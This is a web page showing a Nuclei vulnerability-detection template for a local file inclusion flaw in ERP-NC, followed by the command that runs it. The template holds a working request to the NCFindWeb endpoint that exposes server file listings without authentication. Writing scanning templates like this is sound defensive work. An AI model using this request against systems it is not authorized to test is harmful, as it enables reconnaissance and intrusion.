Skip to content

ERP-NC - Local File Inclusion

ID: erp-nc-directory-traversal

Severity: high

Author: pikpikcu

Tags: lfi,erp-nc

ERP-NC is vulnerable to local file inclusion.

id: erp-nc-directory-traversal
info:
name: ERP-NC - Local File Inclusion
author: pikpikcu
severity: high
description: ERP-NC is vulnerable to local file inclusion.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,erp-nc
http:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
matchers-condition: and
matchers:
- type: word
words:
- "Client"
- "ncwslogin.jsp"
- "admin.jsp"
part: body
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c5bf129f40b1bf05554114f5718e936b041e34ef25d31e6f44153f5cd06a57a5022100cc0651763f719a4bbaf11ff154245ed768a36c08cd67e8b24119fee07e93619a:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml"

View on Github